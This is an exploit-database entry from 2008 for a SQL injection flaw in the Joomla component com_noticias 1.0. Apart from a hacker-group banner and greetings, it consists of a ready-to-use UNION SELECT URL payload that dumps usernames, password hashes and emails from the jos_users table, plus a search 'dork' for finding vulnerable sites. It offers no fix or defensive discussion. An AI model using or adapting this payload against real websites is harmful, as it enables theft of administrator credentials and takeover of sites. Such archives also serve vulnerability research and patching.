Joomla! Component com_noticias 1.0 - SQL Injection

EDB-ID:

5081


Author:

xcorpitx

Type:

webapps


Platform:

PHP

Date:

2008-02-07


  ##     ##     
   ##   ##      
    ## ##
     ###CoRPITX 
     ###     
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#         joomla (com_noticias)SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net/
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU LL SEE ADMÝN NAME,ADMIN HASH AND EMAÝL 
########################################################################
#
#  DorK   : ''com_noticias''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
#
index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email),2,3,4,5/**/%20from/**/%20jos_users/*
#
########################################################################

Thanks my friends : Hayalet,D3NGES!Z,PC FARESi,SMOKÝN,MOSTBÝG

# milw0rm.com [2008-02-07]